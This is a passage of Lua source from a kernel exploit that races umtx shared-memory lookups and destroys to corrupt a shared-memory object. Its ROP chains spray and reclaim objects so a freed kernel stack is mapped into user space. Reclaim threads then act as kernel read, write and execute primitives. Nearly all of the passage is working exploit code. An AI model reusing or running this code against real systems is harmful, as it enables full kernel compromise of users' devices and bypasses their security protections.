		rop:push_add_atomic_32(estate.num_finished_threads_addr, 1)

		-- Recover original stack because it may be corrupted.
		rop:push_load_backup()

		-- Go to beginning of outer loop.
		rop:push_set_rsp(rop:use_marker(marker_for_outer_loop_start))

		--
		-- Tail.
		--

		-- Race done, waiting to end.
		rop:set_marker(marker_for_outer_loop_end)

		-- Let other threads to do something.
		rop:push_syscall_noret("sched_yield")

		-- Check for destroy flag set.
		rop:gen_conditional({ estate.destroy_flag_addr }, "==", 0, marker_for_outer_loop_end)

		rop:push_ret()

		destroyer_thread_index = destroyer_thread_index + 1
	end

	local function lookup_rop_cb(rop, thread_id_addr)
		local marker_for_outer_loop_start = rop:generate_marker("outer_loop_start")
		local marker_for_outer_loop_end = rop:generate_marker("outer_loop_end")
		local marker_for_inner_loop1_start = rop:generate_marker("inner_loop1_start")
		local marker_for_inner_loop1_end = rop:generate_marker("inner_loop1_end")
		local marker_for_inner_loop2_start = rop:generate_marker("inner_loop2_start")
		local marker_for_inner_loop2_end = rop:generate_marker("inner_loop2_end")
		local marker_for_lookup_end = rop:generate_marker("lookup_end")
		local marker_for_inner_loop3_start = rop:generate_marker("inner_loop3_start")
		local marker_for_inner_loop3_end = rop:generate_marker("inner_loop3_end")
		local marker_for_inner_loop4_start = rop:generate_marker("inner_loop4_start")
		local marker_for_inner_loop4_end = rop:generate_marker("inner_loop4_end")

		local scratch_rax_addr = rop:scratch_rax_addr()
		local scratch_errno_addr = rop:scratch_errno_addr()
		local return_value_addr = estate.thread_return_value_addr
		local errno_addr = estate.thread_errno_addr

		--
		-- Outer loop that runs until race done flag is set.
		--

		rop:set_marker(marker_for_outer_loop_start)

		-- Check for race done flag set.
		rop:gen_conditional({ estate.race_done_flag_addr }, "==", 0, marker_for_inner_loop1_start, marker_for_outer_loop_end)

		rop:push_set_rsp(rop:use_marker(marker_for_outer_loop_start))

		--
		-- Inner loop #1 that waits until all threads and objects will be initialized.
		--

		rop:set_marker(marker_for_inner_loop1_start)

		-- Check for ready flag set.
		rop:gen_conditional({ estate.ready_flag_addr }, "==", 0, function(rop)
			rop:push_syscall_noret("sched_yield")
		end, marker_for_inner_loop1_end)

		rop:push_set_rsp(rop:use_marker(marker_for_inner_loop1_start))

		rop:set_marker(marker_for_inner_loop1_end)

		-- Notify main thread that lookup thread is ready to start.
		rop:push_add_atomic_32(estate.num_ready_threads_addr, 1)

		--
		-- Inner loop #2 that waits for destroy signal.
		--

		rop:set_marker(marker_for_inner_loop2_start)

		-- Check for destroy flag set.
		rop:gen_conditional({ estate.destroy_flag_addr }, "==", 0, function(rop)
			rop:push_syscall_noret("sched_yield")
		end, marker_for_inner_loop2_end)

		rop:push_set_rsp(rop:use_marker(marker_for_inner_loop2_start))

		rop:set_marker(marker_for_inner_loop2_end)

		-- Trigger lookup of UMTX.
		rop:push_syscall_safe("umtx_op", 0, globals.UMTX_OP_SHM, globals.UMTX_SHM_LOOKUP, estate.shm_key_1, 0)
		rop:push_load_rax(scratch_rax_addr)
		rop:push_store_rax(return_value_addr)
		rop:push_load_rax(scratch_errno_addr)
		rop:push_store_rax(errno_addr)

		-- Check for lookup result.
		rop:gen_conditional({ return_value_addr }, "!=", -1, function(rop)
			rop:push_load_rax(return_value_addr)
			rop:push_store_rax(estate.lookup_fd_addr)
		end, marker_for_lookup_end)

		rop:set_marker(marker_for_lookup_end)

		-- Notify that lookup thread done its main job.
		rop:push_add_atomic_32(estate.num_completed_threads_addr, 1)

		--
		-- Inner loop #3 that waits for check done.
		--

		rop:set_marker(marker_for_inner_loop3_start)

		-- Check for check done flag set.
		rop:gen_conditional({ estate.check_done_flag_addr }, "==", 0, function(rop)
			rop:push_syscall_noret("sched_yield")
		end, marker_for_inner_loop3_end)

		rop:push_set_rsp(rop:use_marker(marker_for_inner_loop3_start))

		rop:set_marker(marker_for_inner_loop3_end)

		-- Notify main thread that lookup thread is ready to finish.
		rop:push_add_atomic_32(estate.num_ready_threads_addr, 1)

		--
		-- Inner loop #4 that waits for done flag.
		--

		rop:set_marker(marker_for_inner_loop4_start)

		-- Check for done flag set.
		rop:gen_conditional({ estate.done_flag_addr }, "==", 0, function(rop)
			rop:push_syscall_noret("sched_yield")
		end, marker_for_inner_loop4_end)

		rop:push_set_rsp(rop:use_marker(marker_for_inner_loop4_start))

		rop:set_marker(marker_for_inner_loop4_end)

		-- Notify main thread that lookup thread was finished.
		rop:push_add_atomic_32(estate.num_finished_threads_addr, 1)

		-- Recover original stack because it may be corrupted.
		rop:push_load_backup()

		-- Go to beginning of outer loop.
		rop:push_set_rsp(rop:use_marker(marker_for_outer_loop_start))

		--
		-- Tail.
		--

		-- Race done, waiting to end.
		rop:set_marker(marker_for_outer_loop_end)

		-- Let other threads to do something.
		rop:push_syscall_noret("sched_yield")

		-- Check for destroy flag set.
		rop:gen_conditional({ estate.destroy_flag_addr }, "==", 0, marker_for_outer_loop_end)

		rop:push_ret()
	end

	local function prepare_thread_marker(idx)
		assert(type(idx) == "number")

		-- 41 41 41 [41 + idx]
		local marker = bit32.bor(exp.RECLAIMED_THREAD_MARKER_BASE, bit32.lshift(0x41 + idx, 24))
		local marker_addr = estate.reclaim_thread_marker_addr + (idx - 1) * exp.THREAD_MARKER_BUFFER_SIZE

		if use_blocking_select then
			memory.write64(marker_addr, uint64:new(0, marker))
		else
			local count = math.floor(exp.THREAD_MARKER_BUFFER_SIZE / 0x4)
			for i = 1, count do
				memory.write32(marker_addr + (i - 1) * 0x4, marker)
			end
		end
	end

	local reclaim_thread_index = 0

	local function reclaim_rop_cb(rop, thread_id_addr)
		local marker_for_init_wait_loop_start = rop:generate_marker("init_wait_loop_start")
		local marker_for_wait_loop_start = rop:generate_marker("wait_loop_start")
		local marker_for_recreation_loop = rop:generate_marker("recreation_loop")
		local marker_for_kread_cmd_check = rop:generate_marker("kread_cmd_check")
		local marker_for_kwrite_cmd_check = rop:generate_marker("kwrite_cmd_check")
		local marker_for_kexec_cmd_check = rop:generate_marker("kexec_cmd_check")
		local marker_for_cmd_handler_end = rop:generate_marker("cmd_handler_end")
		local marker_for_release = rop:generate_marker("release")

		local scratch_rax_addr = rop:scratch_rax_addr()
		local scratch_errno_addr = rop:scratch_errno_addr()
		local return_value_addr = estate.thread_return_value_addr + (1 + exp.MAX_DESTROYER_THREADS + reclaim_thread_index) * 0x8
		local errno_addr = estate.thread_errno_addr + (1 + exp.MAX_DESTROYER_THREADS + reclaim_thread_index) * 0x8
		local stack_return_addr = estate.reclaim_thread_stack_return_addr + reclaim_thread_index * 0x8
		local marker_addr = estate.reclaim_thread_marker_addr + reclaim_thread_index * exp.THREAD_MARKER_BUFFER_SIZE
		local marker_copy_addr = marker_addr + 0x8

		-- Prepare thread marker which will be used to determine victim thread ID.
		prepare_thread_marker(reclaim_thread_index + 1)

		--
		-- Initial wait loop that runs until all reclaim threads are created.
		--

		rop:set_marker(marker_for_init_wait_loop_start)

		rop:push_syscall_noret("sched_yield")

		-- Check for ready flag set.
		rop:gen_conditional({ estate.ready_flag_addr }, "!=", 0, marker_for_wait_loop_start)

		-- Go to beginning of initial wait loop.
		rop:push_set_rsp(rop:use_marker(marker_for_init_wait_loop_start))

		--
		-- Wait loop that runs until kernel stack is obtained.
		--

		rop:set_marker(marker_for_wait_loop_start)

		if use_blocking_select then
			-- Copy marker because |select| may overwrite it.
			rop:push_load_rax(marker_addr)
			rop:push_store_rax(marker_copy_addr)
		end

		rop:push_syscall_noret("sched_yield")

		-- Check which thread marker was found.
		rop:gen_conditional({ estate.victim_thread_id_addr }, "!=", { thread_id_addr }, function(rop)
			-- Check if we need to finish.
			rop:gen_conditional({ estate.destroy_flag_addr }, "==", 1, marker_for_release)

			if use_blocking_select then
				rop:push_syscall_noret("select", 1, marker_copy_addr, 0, 0, estate.timeout_addr)
			else
				for i = 1, exp.MAX_RECLAIM_SYSTEM_CALLS do
					rop:push_syscall_noret("ioctl", 0xbeef, globals.IOW(0, 0, exp.THREAD_MARKER_BUFFER_SIZE), marker_addr)
				end
			end
		end, marker_for_recreation_loop)

		-- Recover original stack because it may be corrupted.
		rop:push_load_backup()

		-- Go to beginning of wait loop.
		rop:push_set_rsp(rop:use_marker(marker_for_wait_loop_start))

		--
		-- Wait loop for recreation phase.
		--

		rop:set_marker(marker_for_recreation_loop)

		-- Let's wait some time whilst we unmap shared memory region and
		-- recreate it with original stack contents. Make it using blocking call
		-- of reading from empty pipe.
		rop:push_syscall_safe("read", estate.rpipe_fd, estate.pipe_buf_addr, exp.MAX_PIPE_BUFFER_SIZE)
		rop:push_load_rax(scratch_rax_addr)
		rop:push_store_rax(return_value_addr)
		rop:push_load_rax(scratch_errno_addr)
		rop:push_store_rax(errno_addr)

		--
		-- Command processor loop.
		--

		rop:set_marker(marker_for_kread_cmd_check)

		rop:push_syscall_noret("sched_yield")

		-- Check for read command.
		rop:gen_conditional({ estate.cmd_addr }, "==", exp.CMD_KREAD, function(rop)
			-- Do blocking write pipe call.
			rop:push_syscall_safe("write", estate.wpipe_fd, estate.pipe_buf_addr, { estate.rw_size_addr })
			rop:push_load_rax(scratch_rax_addr)
			rop:push_store_rax(return_value_addr)
			rop:push_load_rax(scratch_errno_addr)
			rop:push_store_rax(errno_addr)

			-- Reset wait flag.
			rop:push_store_zero_32(estate.cmd_wait_flag_addr)

			-- Reset command.
			rop:push_store_zero_32(estate.cmd_addr)
		end, marker_for_kwrite_cmd_check)

		-- Go to ending of command processor loop.
		rop:push_set_rsp(rop:use_marker(marker_for_cmd_handler_end))

		rop:set_marker(marker_for_kwrite_cmd_check)

		rop:push_syscall_noret("sched_yield")

		-- Check for write command.
		rop:gen_conditional({ estate.cmd_addr }, "==", exp.CMD_KWRITE, function(rop)
			-- Do blocking read pipe call.
			rop:push_syscall_safe("read", estate.rpipe_fd, estate.pipe_buf_addr, { estate.rw_size_addr })
			rop:push_load_rax(scratch_rax_addr)
			rop:push_store_rax(return_value_addr)
			rop:push_load_rax(scratch_errno_addr)
			rop:push_store_rax(errno_addr)

			-- Reset wait flag.
			rop:push_store_zero_32(estate.cmd_wait_flag_addr)

			-- Reset command.
			rop:push_store_zero_32(estate.cmd_addr)
		end, marker_for_kexec_cmd_check)

		-- Go to ending of command processor loop.
		rop:push_set_rsp(rop:use_marker(marker_for_cmd_handler_end))

		rop:set_marker(marker_for_kexec_cmd_check)

		rop:push_syscall_noret("sched_yield")

		-- Check for execute command.
		rop:gen_conditional({ estate.cmd_addr }, "==", exp.CMD_KEXEC, function(rop)
			assert(type(estate.exec_rop) == "table")

			-- Execute another ROP chain and return back.
			rop:push_set_rsp(estate.exec_rop:data_addr())

			-- Store current stack address to be able to return back.
			memory.write64(stack_return_addr, rop:current_addr())

			-- Let main thread to catch it.
			rop:push_syscall_noret("sched_yield")

			-- Reset wait flag.
			rop:push_store_zero_32(estate.cmd_wait_flag_addr)

			-- Reset command.
			rop:push_store_zero_32(estate.cmd_addr)
		end, marker_for_cmd_handler_end)

		rop:set_marker(marker_for_cmd_handler_end)

		-- Let other threads to do something.
		rop:push_syscall_noret("sched_yield")

		-- Recover original stack because it may be corrupted.
		rop:push_load_backup()

		-- Go to beginning of command processor loop.
		rop:push_set_rsp(rop:use_marker(marker_for_kread_cmd_check))

		--
		-- Tail.
		--

		-- Not victim thread, release it.
		rop:set_marker(marker_for_release)
		rop:push_ret()

		reclaim_thread_index = reclaim_thread_index + 1
	end

	runner(function()
		for i = 1, exp.MAX_DESTROYER_THREADS do
			dbgf("creating racing thread #2/#%u", i)

			local offset = i * estate.combined_rop_storage_size
			local read_addr = estate.combined_rop_storage_read_addr + offset
			local write_addr = estate.combined_rop_storage_write_addr + offset

			dbgf("readable memory at %s of size 0x%x", read_addr, estate.combined_rop_storage_size)
			dbgf("writeable memory at %s of size 0x%x", write_addr, estate.combined_rop_storage_size)

			local storage = make_ropchain_storage_default(sprintf("dthr_%03d", i), exp.ROP_CAPACITY, exp.ROP_SCRATCH_SIZE, nil, read_addr, write_addr, estate.combined_rop_storage_size, estate.rop_storage_cleanup_cb)
			--dbgf("storage: %s %s", addr_of(storage), inspect(storage))

			-- Create new thread, set up its ROP chain and set name.
			local thr = thread:new(main_rop, destroyer_rop_cb, true, false, storage, sprintf("dthr_%03d", i))

			if toggle_state_debugging then
				logf("racing thread #2/#%u rop stack @ %s", i, thr:thread_rop():data_addr())
				logf(thr:dump_rop_stack(filter_addr_keys(estate)))
			end

			if not thr:start() then
				errorf("starting racing thread #2/#%u failed", i)
			end

			-- Wait some time, otherwise we may not be able to get thread id.
			thr:wait_to_become_live()

			-- Move destroyer thread to separate core.
			if not set_thread_cpu_affinity(main_rop, thr:thread_id(), exp.DESTROYER_THREAD_CORES[i]) then
				errorf("setting racing thread #2/#%u cpu affinity mask failed", i)
			end

			if toggle_set_thread_priorities then
				-- Set destroyer thread priority in thus way so it will run before lookup thread.
				if not set_thread_priority(main_rop, thr:thread_id(), { type = exp.THREAD_PRIORITY_TYPE, prio = exp.DESTROYER_THREAD_PRIORITY[i] }) then
					errorf("setting racing thread #2/#%u priority failed", i)
				end
			end

			table.insert(estate.destroyer_thrs, thr)
		end
	end)

	runner(function()
		dbgf("creating racing thread #1")

		local read_addr = uint64:new(estate.combined_rop_storage_read_addr)
		local write_addr = uint64:new(estate.combined_rop_storage_write_addr)

		dbgf("readable memory at %s of size 0x%x", read_addr, estate.combined_rop_storage_size)
		dbgf("writeable memory at %s of size 0x%x", write_addr, estate.combined_rop_storage_size)

		local storage = make_ropchain_storage_default("lthr", exp.ROP_CAPACITY, exp.ROP_SCRATCH_SIZE, nil, read_addr, write_addr, estate.combined_rop_storage_size, estate.rop_storage_cleanup_cb)
		--dbgf("storage: %s %s", addr_of(storage), inspect(storage))

		-- Create new thread, set up its ROP chain and set name.
		local thr = thread:new(main_rop, lookup_rop_cb, true, false, storage, "lthr")

		if not thr:start() then
			errorf("starting racing thread #1 failed")
		end

		if toggle_state_debugging then
			logf("racing thread #1 rop stack @ %s", thr:thread_rop():data_addr())
			logf(thr:dump_rop_stack(filter_addr_keys(estate)))
		end

		-- Wait some time, otherwise we may not be able to get thread id.
		thr:wait_to_become_live()

		-- Move lookup thread to separate core.
		if not set_thread_cpu_affinity(main_rop, thr:thread_id(), exp.LOOKUP_THREAD_CORES) then
			errorf("setting racing thread #1 cpu affinity mask failed")
		end

		if toggle_set_thread_priorities then
			-- Set lookup thread priority in thus way so it will run after destroyer threads.
			if not set_thread_priority(main_rop, thr:thread_id(), { type = exp.THREAD_PRIORITY_TYPE, prio = exp.LOOKUP_THREAD_PRIORITY }) then
				errorf("setting racing thread #1 priority failed")
			end
		end

		estate.lookup_thr = thr
	end)

	runner(function()
		dbgf("creating reclaim threads")

		for i = 1, exp.MAX_RECLAIM_OBJECTS do
			dbgf("creating reclaim thread #%u", i)

			local offset = (exp.MAX_DESTROYER_THREADS + i) * estate.combined_rop_storage_size
			local read_addr = estate.combined_rop_storage_read_addr + offset
			local write_addr = estate.combined_rop_storage_write_addr + offset

			dbgf("readable memory at %s of size 0x%x", read_addr, estate.combined_rop_storage_size)
			dbgf("writeable memory at %s of size 0x%x", write_addr, estate.combined_rop_storage_size)

			local storage = make_ropchain_storage_default(sprintf("rclm_%03d", i), exp.ROP_CAPACITY, exp.ROP_SCRATCH_SIZE, nil, read_addr, write_addr, estate.combined_rop_storage_size, estate.rop_storage_cleanup_cb)
			--dbgf("storage: %s %s", addr_of(storage), inspect(storage))

			-- Create new thread, set up its ROP chain and set name.
			local thr = thread:new(main_rop, reclaim_rop_cb, true, false, storage, exp.VICTIM_THREAD_NAME)

			if toggle_state_debugging then
				logf("reclaim thread %#u stack @ %s", i, thr:thread_rop():data_addr())
				logf(thr:dump_rop_stack(filter_addr_keys(estate)))
			end

			table.insert(estate.reclaim_thrs, thr)

			-- It is important otherwise it may crash due to memory outage.
			collectgarbage()
		end

		dbgf("reclaim threads created")
	end)

	--
	-- Initial exploitation that triggers memory corruption.
	--

	local function reset_state(rop)
		memory.write32(estate.race_done_flag_addr, 0)
		memory.write32(estate.ready_flag_addr, 0)
		memory.write32(estate.destroy_flag_addr, 0)
		memory.write32(estate.check_done_flag_addr, 0)
		memory.write32(estate.done_flag_addr, 0)
		memory.write32(estate.num_ready_threads_addr, 0)
		memory.write32(estate.num_completed_threads_addr, 0)
		memory.write32(estate.num_destroys_addr, 0)
		memory.write32(estate.num_finished_threads_addr, 0)

		memory.write32(estate.original_fd_addr, -1)
		memory.write32(estate.lookup_fd_addr, -1)
		memory.write32(estate.winner_fd_addr, -1)

		for i = 1, exp.MAX_DESTROYER_THREADS do
			memory.write32(estate.fds_for_reclaim_addr + (i - 1) * 0x8, -1)
		end

		local count = 1 + exp.MAX_DESTROYER_THREADS + exp.MAX_RECLAIM_OBJECTS

		for i = 1, count do
			memory.write64(estate.thread_return_value_addr + (i - 1) * 0x8, 0)
			memory.write32(estate.thread_errno_addr + (i - 1) * 0x8, 0)
		end
	end

	local function truncate_shm_file(rop, fd)
		assert(type(fd) == "number")

		-- To be able to know file descriptor for specific SHM we set its size as multiple of |exp.MAGIC_NUMBER|.
		local size = fd * exp.MAGIC_NUMBER

		return truncate_file(rop, fd, size)
	end

	local function populate_exploited_fds(fd)
		local idx = table.index_of(estate.exploited_fds, fd)
		if idx == nil then
			table.insert(estate.exploited_fds, fd)
			return true
		else
			return false
		end
	end

	local function check_for_corruption(rop)
		local original_fd = as_sint32(memory.read32(estate.original_fd_addr))
		if original_fd < 0 then
			warnf("check_for_corruption: no original fd")
			return nil
		end

		local lookup_fd = as_sint32(memory.read32(estate.lookup_fd_addr))
		if lookup_fd < 0 then
			dbgf("check_for_corruption: no victim fd")
			return nil
		end
		populate_exploited_fds(lookup_fd)

		dbgf("check_for_corruption: original fd: %d, victim fd: %d", original_fd, lookup_fd)

		local size = get_file_size(rop, lookup_fd)
		if size == nil then
			warnf("check_for_corruption: getting file size for victim fd %d failed", lookup_fd)
			return nil
		end
		dbgf("check_for_corruption: size: %s", size)

		local fd = as_sint32((size / exp.MAGIC_NUMBER).lo)
		dbgf("check_for_corruption: calculated fd: %d", fd)

		if fd ~= original_fd and fd ~= lookup_fd then
			dbgf("check_for_corruption: found different fd: %d", fd)
			return fd
		else
			return nil
		end
	end

	local function cleanup_state(rop)
		for i = 1, exp.MAX_DESTROYER_THREADS do
			local fd_addr = estate.fds_for_reclaim_addr + (i - 1) * 0x8
			local fd = as_sint32(memory.read32(fd_addr))
			if fd >= 0 then
				dbgf("cleanup_state: closing fd for reclaim %d", fd)
				if not close_file(rop, fd) then
					warnf("cleanup_state: closing fd for reclaim %d failed", fd)
				end
				memory.write32(fd_addr, -1)
			end
		end

		local fd = as_sint32(memory.read32(estate.lookup_fd_addr))
		if fd >= 0 then
			dbgf("cleanup_state: closing victim fd %d", fd)
			if not close_file(rop, fd) then
				warnf("cleanup_state: closing victim fd %d failed", fd)
			end
			memory.write32(estate.lookup_fd_addr, -1)
		end

		dbgf("cleanup_state: destroying umtx shm #2")
		if umtx_shm_destroy(rop, estate.shm_key_2) then
			dbgf("cleanup_state: destroying umtx shm #2 succeeded unexpectedly")
		end

		dbgf("cleanup_state: destroying umtx shm #1")
		if umtx_shm_destroy(rop, estate.shm_key_1) then
			dbgf("cleanup_state: destroying umtx shm #1 succeeded unexpectedly")
		end
	end

	local function wait_for(addr, threshold, text)
		local count

		while true do
			count = memory.read32(addr)
			if count >= threshold then
				break
			end

			dbgf("main_thread: waiting for" .. text .. " (%u/%u)", count, threshold)
			yield(main_rop)
		end

		dbgf("main_thread: done waiting for" .. text .. " (%u/%u)", count, threshold)
	end

	local num_iterations = 0
	local result, errno
	local winner_fd, fd

	dbgf("main_thread: resetting state")
	reset_state(main_rop)

	while memory.read32(estate.race_done_flag_addr) == 0 do
		dbgf("main_thread: starting")

		-- Create UMTX and corresponding SHM object.
		dbgf("main_thread: creating umtx shm #1")
		fd = umtx_shm_create(main_rop, estate.shm_key_1)
		if fd == nil then
			errorf("main_thread: creating umtx shm #1 failed")
		end
		dbgf("main_thread: original fd: %d", fd)

		-- Keep original file descriptor number for further checks.
		memory.write32(estate.original_fd_addr, fd)

		if estate.first_original_fd < 0 then
			estate.first_original_fd = fd
		end

		-- Set SHM size thus way so we could know its file descriptor based on this size.
		dbgf("main_thread: truncating original fd %d", fd)
		if not truncate_shm_file(main_rop, fd) then
			errorf("main_thread: truncating original fd %d failed", fd)
		end

		-- Close created file descriptor to decrement SHM reference counter.
		dbgf("main_thread: closing original fd %d", fd)
		if not close_file(main_rop, fd) then
			errorf("main_thread: closing original fd %d failed", fd)
		end

		dbgf("main_thread: we are ready to start")

		-- Notify other threads that we are ready to start.
		memory.write32(estate.ready_flag_addr, 1)

		-- Wait for other threads to be active.
		wait_for(estate.num_ready_threads_addr, exp.MAX_DESTROYER_THREADS + 1, " threads to be ready") -- plus one for lookup thread

		-- Clear ready flag, thus no other thread will start its loop again prematurely.
		memory.write32(estate.ready_flag_addr, 0)

		-- Reset destroyer thread counter to reuse it during clean up.
		memory.write32(estate.num_ready_threads_addr, 0)

		-- Notify destroyer threads that they should try to destroy SHM.
		memory.write32(estate.destroy_flag_addr, 1)

		-- Wait until other threads will do their main job.
		wait_for(estate.num_completed_threads_addr, exp.MAX_DESTROYER_THREADS + 1, " threads to be completed") -- plus one for lookup thread

		local n = memory.read32(estate.num_destroys_addr)
		dbgf("main_thread: number of succeeded destroys %u", n)

		dbgf("main_thread: let's do spraying and praying")

		-- Spray UMTX/SHM objects.
		for i = 1, exp.MAX_DESTROYER_THREADS do
			dbgf("main_thread: switching to racing thread #2/#%u core", i)
			if not set_current_thread_cpu_affinity(main_rop, exp.DESTROYER_THREAD_CORES[i]) then
				errorf("main_thread: switching to racing thread #2/#%u core failed", i)
			end

			-- Create second UMTX and corresponding SHM object.
			dbgf("main_thread: creating umtx shm #2")
			fd = umtx_shm_create(main_rop, estate.shm_key_2)
			if fd == nil then
				errorf("main_thread: creating umtx shm #2 failed")
			end
			dbgf("main_thread: new fd: %d", fd)

			-- Keep new file descriptor number for further checks.
			memory.write32(estate.fds_for_reclaim_addr + (i - 1) * 0x8, fd)

			-- Set its SHM size.
			dbgf("main_thread: truncating new fd %d", fd)
			if not truncate_shm_file(main_rop, fd) then
				errorf("main_thread: truncating new fd %d failed", fd)
			end

			-- Destroy just created UMTX.
			dbgf("main_thread: destroying new umtx shm #2")
			if not umtx_shm_destroy(main_rop, estate.shm_key_2) then
				errorf("main_thread: destroying new umtx shm #2 failed")
			end
		end

		dbgf("main_thread: switching to initial core")
		if not set_current_thread_cpu_affinity(main_rop, exp.MAIN_THREAD_CORES) then
			errorf("main_thread: switching to initial core failed")
		end

		dbgf("main_thread: spraying done")

		-- If lookup succeeded then do check against SHM file object to determine file descriptor.
		winner_fd = check_for_corruption(main_rop)
		if winner_fd ~= nil then
			dbgf("main_thread: checking succeeded with winner fd: %d", winner_fd)
			memory.write32(estate.winner_fd_addr, winner_fd)
		else
			dbgf("main_thread: checking failed")
		end

		-- Close unneeded file descriptors.
		for i = 1, exp.MAX_DESTROYER_THREADS do
			local fd_addr = estate.fds_for_reclaim_addr + (i - 1) * 0x8
			local need_close = true

			fd = as_sint32(memory.read32(fd_addr))
			if fd >= 0 then
				if winner_fd ~= nil and fd == winner_fd then
					-- We do not need to close it, so clear descriptor.
					memory.write32(fd_addr, -1)
					estate.destroyer_index = i
					need_close = false
				end

				if need_close then
					dbgf("main_thread: closing new fd %d of racing thread #2/#%u", fd, i)
					if not close_file(main_rop, fd) then
						errorf("main_thread: closing new fd %d of racing thread #2/#%u failed", fd, i)
					end
					memory.write32(fd_addr, -1)
				end
			end
		end

		-- Notify all threads that they should not be destroyed yet.
		memory.write32(estate.destroy_flag_addr, 0)

		-- Notify other threads that check was done.
		memory.write32(estate.check_done_flag_addr, 1)

		if n == exp.MAX_DESTROYER_THREADS and winner_fd ~= nil then
			-- Set new SHM size.
			dbgf("main_thread: truncating winner fd %d", winner_fd)
			if not truncate_file(main_rop, winner_fd, globals.kstack_size) then
				errorf("main_thread: truncating winner fd %d failed", winner_fd)
			end

			if toggle_debugging then
				local lookup_fd = as_sint32(memory.read32(estate.lookup_fd_addr))
				local lookup_size = get_file_size(main_rop, lookup_fd)
				dbgf("main_thread: victim fd %d size: %s", lookup_fd, lookup_size)

				local winner_size = get_file_size(main_rop, winner_fd)
				dbgf("main_thread: winner fd %d size: %s", winner_fd, winner_size)
			end

			-- Notify other threads that race succeeded.
			memory.write32(estate.race_done_flag_addr, 1)

			dbgf("main_thread: we have some result!!!")
		end

		-- Wait until other threads will be ready to finish.
		wait_for(estate.num_ready_threads_addr, exp.MAX_DESTROYER_THREADS + 1, " threads to be ready for finish") -- plus one for lookup thread

		-- Notify other threads that we are done.
		memory.write32(estate.done_flag_addr, 1)

		-- Wait until other threads will be finished.
		wait_for(estate.num_finished_threads_addr, exp.MAX_DESTROYER_THREADS + 1, " threads to be finished") -- plus one for lookup thread

		-- Reset everything if we did not find winner file descriptor.
		if winner_fd == nil then
			dbgf("main_thread: cleaning state")
			cleanup_state(main_rop)

			dbgf("main_thread: resetting state")
			reset_state(main_rop)
		end

		dbgf("main_thread: finishing")

		num_iterations = num_iterations + 1
	end

	-- Recover initial CPU affinity mask for main thread.
	dbgf("main_thread: recovering initial cpu affinity mask for main thread")
	if not set_current_thread_cpu_affinity(main_rop, initial_cpu_affinity) then
		errorf("recovering initial cpu affinity mask for main thread failed")
	end

	-- Redundant check of file descriptors.
	if winner_fd ~= nil then
		fd = as_sint32(memory.read32(estate.original_fd_addr))
		dbgf("original fd: %d", fd)

		fd = as_sint32(memory.read32(estate.lookup_fd_addr))
		if fd < 0 then
			errorf("race done but no victim fd")
		end
		dbgf("victim fd: %d", fd)

		fd = as_sint32(memory.read32(estate.winner_fd_addr))
		if fd < 0 then
			errorf("race done but no winner fd")
		end
		dbgf("winner fd: %d", fd)

		logf("exploit succeeded in %u iterations", num_iterations)
	else
		warnf("exploit failed after %u iterations", num_iterations)
	end

	-- Notify other threads that we are done.
	memory.write32(estate.race_done_flag_addr, 1)

	return winner_fd ~= nil
end

-------------------------------------------------------------------------------

local function get_pcb_td_from_kstack(kstack_addr) -- returns pointer to |struct pcb|
	-- Based on implementation of |get_pcb_td|.
	assert(is_uint64(kstack_addr))
	return kstack_addr + globals.num_kstack_pages * globals.PAGE_SIZE - bit32.round_pow2(globals.CPU_MAX_EXT_STATE_SIZE, globals.XSAVE_AREA_ALIGN) - globals.sizeof_pcb
end

local function get_pcb_user_save_td_from_kstack(kstack_addr) -- returns pointer to |struct savefpu|
	-- Based on implementation of |get_pcb_user_save_td|.
	return get_pcb_td_from_kstack(kstack_addr) + globals.sizeof_pcb
end

local function get_frame_from_kstack(kstack_addr) -- returns pointer to |struct trapframe|
	-- Based on implementation of |cpu_thread_alloc|.
	return get_pcb_td_from_kstack(kstack_addr) - globals.sizeof_trapframe
end

function post_exploit()
	local status = false

	assert(estate.destroyer_index ~= nil)

	-- Reset destroy flag.
	memory.write32(estate.destroy_flag_addr, 0)

	-- Switch main thread core to bypass any possible freed memory caching.
	--dbgf("switching main thread core to racing thread #2/#%u core", estate.destroyer_index)
	--if not set_current_thread_cpu_affinity(main_rop, exp.DESTROYER_THREAD_CORES[estate.destroyer_index]) then
	--	errorf("switching main thread core to racing thread #2/#%u core failed", estate.destroyer_index)
	--end

	dbgf("creating extra umtx shm")

	for i = 1, exp.MAX_EXTRA_UMTX_SHMS do
		-- Create extra UMTX and corresponding SHM object.
		local fd = umtx_shm_create(main_rop, estate.shm_key_3)
		if fd == nil then
			errorf("creating extra umtx shm failed")
		end
		dbgf("extra fd [%d]: %d", i, fd)
	end

	local winner_fd = as_sint32(memory.read32(estate.winner_fd_addr))
	local lookup_fd = as_sint32(memory.read32(estate.lookup_fd_addr))

	-- Free SHM object.
	if winner_fd >= 0 then
		dbgf("closing winner fd %d", winner_fd)
		if not close_file(main_rop, winner_fd) then
			errorf("closing winner fd %d failed", winner_fd)
		end
		memory.write32(estate.winner_fd_addr, -1)
	end

	-- Map memory of freed SHM object.

	dbgf("mapping memory of victim fd %d", lookup_fd)

	local addr = map_memory(main_rop, 0, globals.kstack_size, 0, globals.MAP_SHARED, lookup_fd, 0)
	if addr ~= nil then
		table.insert(estate.saved_kstack_addrs, uint64:new(addr))

		dbgf("protecting memory of victim fd %d", lookup_fd)
		if protect_memory(main_rop, addr, globals.kstack_size, bit32.bor(globals.PROT_READ, globals.PROT_WRITE)) then
			estate.kstack_addr = addr
			logf("kstack %s of size 0x%x", estate.kstack_addr, globals.kstack_size)
		else
			warnf("protecting memory of victim fd %d failed", lookup_fd)
			addr = nil
		end
	end

	if addr ~= nil then
		-- Start reclaim threads to occupy freed SHM object for kernel stack.

		logf("starting reclaim threads")

		for i = 1, exp.MAX_RECLAIM_OBJECTS do
			dbgf("starting reclaim thread #%u", i)

			local thr = estate.reclaim_thrs[i]

			if thr:start() then
				-- Wait some time, otherwise we may not be able to get thread id.
				thr:wait_to_become_live()

				local thread_id = thr:thread_id()

				-- Doing this cause weird thread racing issues bringing inconsistent results when doing kernel memory access,
				-- however it does not cause any serious problems.
				-- Move reclaim thread to destroyer thread core.
				--if not set_thread_cpu_affinity(main_rop, thread_id, exp.DESTROYER_THREAD_CORES[estate.destroyer_index]) then
				--	errorf("setting reclaim thread #%u cpu affinity mask failed", i)
				--end

				if toggle_set_thread_priorities then
					-- Set reclaim thread priority.
					if not set_thread_priority(main_rop, thread_id, { type = exp.THREAD_PRIORITY_TYPE, prio = exp.RECLAIM_THREAD_PRIORITY }) then
						errorf("setting reclaim thread #%u priority failed", i)
					end
				end

				dbgf("reclaim thread #%u started with id %d (0x%x)", i, thread_id, thread_id)
			else
